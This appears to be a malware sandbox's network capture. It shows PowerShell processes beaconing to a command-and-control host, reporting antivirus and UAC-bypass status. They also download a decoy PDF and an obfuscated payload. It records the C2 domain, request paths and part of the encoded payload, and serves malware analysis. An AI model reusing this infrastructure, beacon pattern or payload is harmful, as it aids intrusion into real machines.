                                                                                                        Date: Fri, 08 Nov 2024 10:10:39 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mJAbnK8k%2BeHirBuw77mrc6Mur4cWgstGGDokc94ARvS4aVBrvVbEawaUf94TTPKjXvX%2B5P1rbrH1zWw8iRTFpjbOk0r3z8rTPcm5ofLTqi2JjnpnlP9xR5CtBazmdMyCRX5xdfxhizkz"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=20986&sent=129&recv=133&lost=0&retrans=0&sent_bytes=63100&recv_bytes=71219&delivery_rate=11948849&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c6421a26c3f0-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102110&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1034&delivery_rate=37450&cwnd=252&unsent_bytes=0&cid=a1e7ddeee1eab41a&ts=811&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.11.3049767172.67.137.624431276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:39 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c066b7fcc8d19123b48461b1b5d1cd9e HTTP/1.1
                                                                                                        Content-Type: application/json
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Content-Length: 86
                                                                                                        2024-11-08 10:10:39 UTC86OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4d 75 74 65 78 20 69 73 20 6e 6f 74 20 6c 6f 63 6b 65 64 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 41 56 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                        Data Ascii: [ "\"Mutex is not locked\"", "\"AV Windows Defender\"", "----------"]
                                                                                                        2024-11-08 10:10:40 UTC948INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:10:40 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6SBiQ7XGPYEQX2Xp6H%2BiEa%2BJd9qGAx9gSS8oTtN6xzMMIAP6lho9s%2FA%2F2QL1LrEVvmTue8tl%2BDhXF1vuSoHDSlgAbjMeQMgzr1E8CyrN%2FY1QSumZNKTLA4k%2B%2BlH4nQWelXxa96DNLll"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=27076&sent=132&recv=136&lost=0&retrans=0&sent_bytes=63843&recv_bytes=72098&delivery_rate=11948849&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c6492dc24273-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102395&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1035&delivery_rate=37085&cwnd=252&unsent_bytes=0&cid=8f37142e33772634&ts=816&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.11.3049768172.67.137.62443680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:40 UTC394OUTGET /file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33b543072600841d338722d8be39e0fbed7d8f360f490a597da48fdbe0b3c26e45bedad6338962586c553b7cf7f7fc173c2a7dc525b9d1b673338dc56e13d8e74d8544e3a61b2c33131f73315a439626d3 HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-08 10:10:41 UTC1054INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:10:41 GMT
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Length: 137244
                                                                                                        Connection: close
                                                                                                        content-disposition: attachment; filename=file; filename*=UTF-8''file
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vLB3U5mdQjj8g6cf8ORm8dP2igPMq1tseoaL16qVSzi7bqqmpTrREjrclpojSfDMFu6ym1yIl2QsoJf%2BIxcdWZ2xpdWHDRErL%2BoTP68j0QQrIna8anQhf1%2BKrvuJmABHZvEIfAkV3EKt"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=30057&sent=134&recv=138&lost=0&retrans=0&sent_bytes=64598&recv_bytes=73106&delivery_rate=11948849&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c64c7a604337-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102680&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1008&delivery_rate=36917&cwnd=252&unsent_bytes=0&cid=a33e9844382c9615&ts=807&x=0"
                                                                                                        2024-11-08 10:10:41 UTC315INData Raw: 25 50 44 46 2d 31 2e 35 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 33 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 72 6f 64 75 63 65 72 20 28 53 6b 69 61 2f 50 44 46 20 6d 39 31 29 0a 2f 72 67 69 64 20 28 50 42 3a 33 35 30 30 37 34 33 38 38 5f 41 53 3a 31 30 30 31 36 37 33 36 37 33 36 38 37 30 34 31 40 31 36 31 35 38 32 39 30 32 32 37 39 38 29 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 43 6f 75 6e 74 20 34 0a 2f 4b 69 64 73 20 5b 34 20 30 20 52 20 35 20 30 20 52 20 36 20 30 20 52 20 37 20 30 20 52 5d 0a 2f 54 79 70 65 20 2f 50 61 67 65 73 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70
                                                                                                        Data Ascii: %PDF-1.5%1 0 obj<</Pages 2 0 R/Type /Catalog>>endobj3 0 obj<</Producer (Skia/PDF m91)/rgid (PB:350074388_AS:1001673673687041@1615829022798)>>endobj2 0 obj<</Count 4/Kids [4 0 R 5 0 R 6 0 R 7 0 R]/Type /Pages>>endobj4 0 obj<</Typ
                                                                                                        2024-11-08 10:10:41 UTC1369INData Raw: 49 6d 61 67 65 49 5d 0a 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 0a 2f 47 33 20 38 20 30 20 52 0a 2f 47 38 20 39 20 30 20 52 0a 2f 47 39 20 31 30 20 30 20 52 0a 3e 3e 0a 2f 58 4f 62 6a 65 63 74 20 3c 3c 0a 2f 58 37 20 31 31 20 30 20 52 0a 3e 3e 0a 2f 46 6f 6e 74 20 3c 3c 0a 2f 46 34 20 31 32 20 30 20 52 0a 2f 46 35 20 31 33 20 30 20 52 0a 2f 46 36 20 31 34 20 30 20 52 0a 3e 3e 0a 3e 3e 0a 2f 4d 65 64 69 61 42 6f 78 20 5b 30 20 30 20 35 39 35 2e 39 31 39 39 38 20 38 34 31 2e 39 31 39 39 38 5d 0a 2f 41 6e 6e 6f 74 73 20 5b 31 35 20 30 20 52 20 31 36 20 30 20 52 20 31 37 20 30 20 52 20 31 38 20 30 20 52 20 31 39 20 30 20 52 20 32 30 20 30 20 52 20 32 31 20 30 20 52 5d 0a 2f 43 6f 6e 74 65 6e 74 73 20 32 32 20 30 20 52 0a 2f 53 74 72 75 63 74 50 61 72 65 6e 74
                                                                                                        Data Ascii: ImageI]/ExtGState <</G3 8 0 R/G8 9 0 R/G9 10 0 R>>/XObject <</X7 11 0 R>>/Font <</F4 12 0 R/F5 13 0 R/F6 14 0 R>>>>/MediaBox [0 0 595.91998 841.91998]/Annots [15 0 R 16 0 R 17 0 R 18 0 R 19 0 R 20 0 R 21 0 R]/Contents 22 0 R/StructParent
                                                                                                        2024-11-08 10:10:41 UTC1369INData Raw: 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0a 2f 57 69 64 74 68 20 36 34 0a 2f 48 65 69 67 68 74 20 36 34 0a 2f 43 6f 6c 6f 72 53 70 61 63 65 20 2f 44 65 76 69 63 65 52 47 42 0a 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 0a 2f 46 69 6c 74 65 72 20 2f 44 43 54 44 65 63 6f 64 65 0a 2f 43 6f 6c 6f 72 54 72 61 6e 73 66 6f 72 6d 20 30 0a 3e 3e 0a 73 74 72 65 61 6d 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e
                                                                                                        Data Ascii: /Subtype /Image/Width 64/Height 64/ColorSpace /DeviceRGB/BitsPerComponent 8/Filter /DCTDecode/ColorTransform 0>>streamJFIFC!"$"$C
                                                                                                        2024-11-08 10:10:41 UTC1369INData Raw: 09 e5 89 58 72 15 bd 31 4b 89 d0 57 b4 b6 b9 5c d6 40 dd c4 8f e1 4b 33 2b a8 63 dc 8e b8 52 ca d4 54 51 d3 b0 99 3d 45 ab d3 2f 9d 68 32 5a 87 8e a9 a4 f2 de aa 33 61 11 e6 e1 48 ea dc 7d 07 d7 1b 1a 7e 9e c4 8a 8f b0 9e 65 e2 ff 00 1a 51 44 6b 3b 4c 33 f0 49 00 81 db 3c 9f a0 ef 18 5e 11 f8 bd 1c 50 d3 e9 fd 5d 5b 53 34 cf 30 8e 9b 31 96 cc 36 9e 02 ca dd 7e f7 01 bd ec 7b e3 aa b6 a9 d1 f0 b1 ed 3c 86 bd 5f 34 f5 63 07 d7 1e be f8 8f 45 60 11 fb da d8 b2 79 90 88 97 fb 44 e7 91 d2 e9 aa 7c 84 4a 04 b9 84 ca 64 1d 6d 1a 9e 2e 3b 16 b7 fa 4e 23 b8 7d ba 62 02 22 32 d5 fe dc a9 80 ef 2b 01 01 4b 37 3b ac a5 81 ef 63 7c 52 5e 61 82 f2 c6 a7 a8 a3 ab 8e 70 1b 7d 74 92 6e 3c f1 d3 fa 8c 34 71 14 64 f8 5f 9c c1 51 1b e4 f5 12 a9 aa a6 5b 44 18 f2 f1 8e 96 f7
                                                                                                        Data Ascii: Xr1KW\@K3+cRTQ=E/h2Z3aH}~eQDk;L3I<^P][S4016~{<_4cE`yD|Jdm.;N#}b"2+K7;c|R^ap}tn<4qd_Q[D
                                                                                                        2024-11-08 10:10:41 UTC517INData Raw: 2f 4c 69 6e 6b 0a 2f 46 20 34 0a 2f 42 6f 72 64 65 72 20 5b 30 20 30 20 30 5d 0a 2f 52 65 63 74 20 5b 32 30 30 2e 38 37 36 35 31 20 37 36 32 2e 33 36 34 39 33 20 33 33 35 2e 34 35 37 31 35 20 37 37 30 2e 33 32 30 34 33 5d 0a 2f 41 20 3c 3c 0a 2f 54 79 70 65 20 2f 41 63 74 69 6f 6e 0a 2f 53 20 2f 55 52 49 0a 2f 55 52 49 20 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 73 65 61 72 63 68 67 61 74 65 2e 6e 65 74 2f 70 75 62 6c 69 63 61 74 69 6f 6e 2f 33 35 30 30 37 34 33 38 38 5f 4d 45 44 49 41 5f 42 55 59 49 4e 47 5f 46 4f 52 5f 44 49 47 49 54 41 4c 5f 4d 41 52 4b 45 54 49 4e 47 3f 65 6e 72 69 63 68 49 64 3d 72 67 72 65 71 2d 34 35 65 38 61 38 32 64 39 33 63 37 62 65 65 30 66 63 31 32 38 66 66 34 30 35 66 61 64 30 30 33 2d 58 58 58 26 65 6e 72 69 63 68 53 6f
                                                                                                        Data Ascii: /Link/F 4/Border [0 0 0]/Rect [200.87651 762.36493 335.45715 770.32043]/A <</Type /Action/S /URI/URI (https://www.researchgate.net/publication/350074388_MEDIA_BUYING_FOR_DIGITAL_MARKETING?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSo
                                                                                                        2024-11-08 10:10:41 UTC1369INData Raw: 49 0a 2f 55 52 49 20 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 73 65 61 72 63 68 67 61 74 65 2e 6e 65 74 2f 70 75 62 6c 69 63 61 74 69 6f 6e 2f 33 35 30 30 37 34 33 38 38 5f 4d 45 44 49 41 5f 42 55 59 49 4e 47 5f 46 4f 52 5f 44 49 47 49 54 41 4c 5f 4d 41 52 4b 45 54 49 4e 47 3f 65 6e 72 69 63 68 49 64 3d 72 67 72 65 71 2d 34 35 65 38 61 38 32 64 39 33 63 37 62 65 65 30 66 63 31 32 38 66 66 34 30 35 66 61 64 30 30 33 2d 58 58 58 26 65 6e 72 69 63 68 53 6f 75 72 63 65 3d 59 32 39 32 5a 58 4a 51 59 57 64 6c 4f 7a 4d 31 4d 44 41 33 4e 44 4d 34 4f 44 74 42 55 7a 6f 78 4d 44 41 78 4e 6a 63 7a 4e 6a 63 7a 4e 6a 67 33 4d 44 51 78 51 44 45 32 4d 54 55 34 4d 6a 6b 77 4d 6a 49 33 4f 54 67 25 33 44 26 65 6c 3d 31 5f 78 5f 33 26 5f 65 73 63 3d 70 75 62 6c 69 63 61
                                                                                                        Data Ascii: I/URI (https://www.researchgate.net/publication/350074388_MEDIA_BUYING_FOR_DIGITAL_MARKETING?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_3&_esc=publica
                                                                                                        2024-11-08 10:10:41 UTC1369INData Raw: 70 75 62 6c 69 63 61 74 69 6f 6e 43 6f 76 65 72 50 64 66 29 0a 3e 3e 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 30 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 41 6e 6e 6f 74 0a 2f 53 75 62 74 79 70 65 20 2f 4c 69 6e 6b 0a 2f 46 20 34 0a 2f 42 6f 72 64 65 72 20 5b 30 20 30 20 30 5d 0a 2f 52 65 63 74 20 5b 36 36 2e 32 39 35 38 38 33 20 35 37 39 2e 33 38 38 33 31 20 31 30 39 2e 33 38 38 31 39 39 20 35 39 33 2e 33 31 30 34 32 5d 0a 2f 41 20 3c 3c 0a 2f 54 79 70 65 20 2f 41 63 74 69 6f 6e 0a 2f 53 20 2f 55 52 49 0a 2f 55 52 49 20 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 73 65 61 72 63 68 67 61 74 65 2e 6e 65 74 2f 70 72 6f 66 69 6c 65 2f 4b 65 72 65 6e 2d 4f 62 61 72 61 3f 65 6e 72 69 63 68 49 64 3d 72 67 72 65 71 2d 34 35 65 38 61 38 32 64 39 33 63 37 62
                                                                                                        Data Ascii: publicationCoverPdf)>>>>endobj20 0 obj<</Type /Annot/Subtype /Link/F 4/Border [0 0 0]/Rect [66.295883 579.38831 109.388199 593.31042]/A <</Type /Action/S /URI/URI (https://www.researchgate.net/profile/Keren-Obara?enrichId=rgreq-45e8a82d93c7b
                                                                                                        2024-11-08 10:10:41 UTC1369INData Raw: 12 28 12 7e e8 3a 61 48 82 a9 aa c6 e6 1f 14 cf 98 7f fa 64 7f c3 f0 39 e1 57 ed 7e 3d fb c9 da 76 ed 27 fd ac 7f 97 31 8a b6 4f 3f e9 78 b9 fb 7e b7 80 46 da 3d ff ff 14 d0 77 e0 5a 5a 7b c6 77 4b c3 bc 6c 69 a9 a9 f6 2d aa 8a 91 89 9b 99 a2 0f 4f fd 57 d4 c0 fe 3d d2 ff a6 f3 d1 af 99 e2 e8 d5 8d 41 05 ec df eb 7f 49 12 27 90 29 5d 20 0c 4c f8 3b 81 64 e3 d8 8d 9d fc 6f 5b 13 b2 81 c7 bb 45 41 37 6d 51 43 69 98 55 ee 62 80 d8 a7 9b a5 4a da 5b b9 40 5b 07 e7 69 0f 92 11 f9 4f c8 0c d6 9e de cd a1 55 9b c3 99 ef 9f 20 e0 7d 1d e2 47 f6 42 44 00 3e 29 97 44 a0 c6 9f 3b 27 e9 ef 4c ca ac 7e 6c 76 fd d3 5f 51 a8 60 f9 f6 da bf ee 48 e2 cf 6b d8 7f c4 3f 70 d8 40 af 99 0b 7a cd 70 e6 b1 15 f0 24 cd 01 0f 1f 6b 79 02 6b 3d d5 99 9c 8f 47 f3 9a c2 c8 49 26 70
                                                                                                        Data Ascii: (~:aHd9W~=v'1O?x~F=wZZ{wKli-OW=AI')] L;do[EA7mQCiUbJ[@[iOU }GBD>)D;'L~lv_Q`Hk?p@zp$kyk=GI&p
                                                                                                        2024-11-08 10:10:41 UTC1369INData Raw: 6d a8 0f 74 0c f5 59 ec e1 e4 47 4c a7 30 a0 ad c9 d7 36 d4 6e 1a 6a 78 0e 2f 9c f1 45 87 49 4c cc dd 50 93 b3 62 43 6e 8d 63 40 1a 43 df d1 9c b5 76 e0 b6 d8 77 6c 0a 69 11 52 b4 ee ac 34 87 18 d1 1b f2 97 f7 cb a0 dd 8e 18 cb e8 7b 93 74 84 81 a3 e5 3b 1c c1 49 e6 45 27 a7 8a 10 82 41 32 16 0a ae 3d 80 19 42 80 42 10 55 3b f0 eb 0d 96 e0 31 b2 e8 14 e7 9d e2 11 76 29 50 05 ee 3a 19 73 78 ef 4b 22 e5 9c 84 2a 2e 33 44 ee ac 5c ae 1c a6 b5 b2 3a 38 30 4c f4 6c 16 7e 63 38 51 5a 0f 23 55 53 41 96 c0 5c 1c a8 43 18 73 99 b1 77 b0 99 53 f6 17 b9 a8 2c 6a 64 e2 e9 c0 9d 54 be 3c 1c 0c 2f 50 6c 79 a4 8a c5 de 1c 18 26 bb d1 bc 14 55 00 24 ec 14 38 f5 06 f8 2b 95 2b 58 4e d2 44 d8 40 57 f8 89 d5 43 d5 00 4f 12 56 e2 49 43 48 f4 32 44 04 62 2c db 61 1c 4f c4 51
                                                                                                        Data Ascii: mtYGL06njx/EILPbCnc@CvwliR4{t;IE'A2=BBU;1v)P:sxK"*.3D\:80Ll~c8QZ#USA\CswS,jdT</Ply&U$8++XND@WCOVICH2Db,aOQ
                                                                                                        2024-11-08 10:10:41 UTC1369INData Raw: 89 55 f6 58 4e 1b c4 1b 16 12 c4 6d 7e 36 06 0b 54 87 6e 40 2e c8 6f 2f 24 89 e0 20 8f 6b 7b 43 46 9c 1e 79 91 a9 8e 42 5f e6 da 95 20 d2 3f 35 97 92 ba 4f d0 90 8b 8e 56 6b 28 d5 64 c4 36 35 17 48 7e 26 f1 22 30 1f 6b ab 8e 10 77 9f c6 56 46 41 b8 45 b9 b6 cf d8 19 32 77 6e 44 5a 4c 29 ac 69 dc 95 db 7b 43 dc 8f 65 31 7c 23 5c 3a df bd f1 8d a2 a9 22 f0 b0 b6 8f 14 42 d3 a9 3c 33 20 8b 44 2b b1 18 61 6e 1d b9 eb 10 3d 67 aa 90 0b 6e 14 dc c2 ae 84 b8 65 f4 74 f3 bc 08 21 98 5b f9 1d 67 06 32 ea 68 5d 71 24 35 4b ef 6f b5 11 87 da be 1a 73 8f 71 4b 43 13 7c 7b 14 8d 77 06 b5 73 01 e3 d6 0a 3e 99 b1 aa 2b 89 24 c6 70 2b 03 da 15 11 87 ba 82 08 47 a1 92 38 11 6e 52 22 59 a5 90 7d eb ea 20 0b b3 22 88 cc b4 b9 02 c8 02 5c f1 c3 20 57 f8 e0 9a a5 38 fc 94 51
                                                                                                        Data Ascii: UXNm~6Tn@.o/$ k{CFyB_ ?5OVk(d65H~&"0kwVFAE2wnDZL)i{Ce1|#\:"B<3 D+an=gnet![g2h]q$5KosqKC|{ws>+$p+G8nR"Y} "\ W8Q


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.11.3049769172.67.137.624431276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:41 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c066b7fcc8d19123b48461b1b5d1cd9e HTTP/1.1
                                                                                                        Content-Type: application/json
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Content-Length: 62
                                                                                                        2024-11-08 10:10:41 UTC62OUTData Raw: 5b 0d 0a 20 20 20 20 22 30 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 6f 20 63 61 6e 20 62 79 70 61 73 73 20 75 61 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                        Data Ascii: [ "0", "\"ko can bypass uac\"", "----------"]
                                                                                                        2024-11-08 10:10:41 UTC938INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:10:41 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2BHf8732qlLvGoPIxKOPFTriJk4yOFb6YHM8WITOU1yijeKjxrVLJ9Lxuh%2FcHCAqOMbwJPn3JdmoCIq%2FdFUBJxZqqxp2M8yCVkxuUNAEOp9Cth13fo6cMIocMtglcKfoIH5eihZIkzoW"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2611&sent=236&recv=199&lost=0&retrans=0&sent_bytes=202689&recv_bytes=73959&delivery_rate=54188106&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c64fdbc48ca1-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102654&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1011&delivery_rate=37265&cwnd=251&unsent_bytes=0&cid=a4d22f4ebff67caa&ts=818&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        10192.168.11.3049770172.67.137.624438236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:45 UTC394OUTGET /file2/0e2b542dde5230d991123cf170512b0225ae8c373d66c8038f016679055f4d5229f8d5ac1df1afd229806593a24a07475c330ced357e5b62ca14794fc90cf9b5b18130bb75e02c6ba1e793807fb6a969dd58fac8a5f2f62a9469dc681627f3d76f41fb2548f810a2297e414d6c9ab966 HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-08 10:10:45 UTC1045INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:10:45 GMT
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Length: 12152
                                                                                                        Connection: close
                                                                                                        content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5M7VDLiZEogNGJbvIVTa0NmuFOYJ3eyopH8fVHoGHSsTeyTi85wCiQ7tv4%2BukMHXfNhKOhGXkBKE2QSF%2FzOUklMZGxMJjCgdsy8cQRIAHdeiP9hOzK%2BtdbowUozLb2jOe26TI2PRQSVr"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2250&sent=4&recv=5&lost=0&retrans=0&sent_bytes=730&recv_bytes=2251&delivery_rate=183694&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c66988a74231-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102435&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1008&delivery_rate=37462&cwnd=252&unsent_bytes=0&cid=b8059c4c00a1e8dd&ts=814&x=0"
                                                                                                        2024-11-08 10:10:45 UTC324INData Raw: 25 60 72 60 66 74 73 7b 77 6a 7b 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 53 6a 34 72 56 55 4f 56 64 56 47 58 54 6b 57 53 4c 6d 5b 30 5b 44 65 56 64 54 30 71 52 56 65 4c 57 54 34 7b 56 57 69 4e 64 6a 6d 45 52 6a 4b 68 63 6d 4b 76 5b 46 30 72 64 56 53 58 55 6d 47 6b 63 55 6d 73 5b 47 65 4e 4c 44 6d 71 50 6b 69 4b 53 6c 53 77 56 6d 69 4a 63 44 79 57 4e 56 6d 69 63 57 5b 70 5b 44 4f 42 4f 31 6d 45 54 6c 5b 4c 63 57 4b 76 58 7b 4f 42 62 30 6d 58 63 44 38 5b 57 7b 47 72 52 54 4c 79 63 46 4f 55 50 56 6d 56 4c 6c 79 30 56 6a 62 34 4c 33 4f 34 50 6a 57 60 57 30 71 72 58 6c 30
                                                                                                        Data Ascii: %`r`fts{wj{<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#Sj4rVUOVdVGXTkWSLm[0[DeVdT0qRVeLWT4{VWiNdjmERjKhcmKv[F0rdVSXUmGkcUms[GeNLDmqPkiKSlSwVmiJcDyWNVmicW[p[DOBO1mETl[LcWKvX{OBb0mXcD8[W{GrRTLycFOUPVmVLly0Vjb4L3O4PjW`W0qrXl0
                                                                                                        2024-11-08 10:10:45 UTC1369INData Raw: 55 56 65 6b 4c 6b 6d 75 5b 44 69 6a 60 46 4f 75 57 56 65 69 56 44 30 6f 58 57 62 30 64 6c 53 49 53 6f 4f 68 53 30 5b 73 53 47 47 77 60 33 48 7b 54 6c 38 60 56 44 71 42 58 6c 34 52 62 46 53 75 63 49 6d 6a 56 44 30 6f 54 47 4f 42 52 47 71 58 54 59 53 56 4c 6b 47 76 57 45 4b 4a 62 57 71 59 55 6b 43 4b 50 7b 47 51 56 57 62 79 63 46 4c 7b 50 6c 69 5b 4c 6d 57 6f 52 56 79 4a 65 6c 48 7b 54 6c 4f 57 4c 6d 5b 70 5b 47 69 4a 62 46 53 48 63 44 53 60 57 7b 54 76 56 6d 69 4b 64 54 6d 71 50 59 53 53 4c 6f 69 6e 58 7b 4f 4f 5b 31 6d 73 53 6f 57 6a 53 33 76 78 58 57 69 4a 4c 56 4c 79 50 6f 6d 68 4c 6d 48 79 56 55 4f 53 60 54 6d 48 65 33 65 56 4c 6c 69 72 58 33 30 57 65 47 50 78 52 6f 47 60 57 31 35 76 52 54 69 7b 5b 31 71 46 4e 49 57 60 53 33 79 37 58 31 65 35 60 46 57
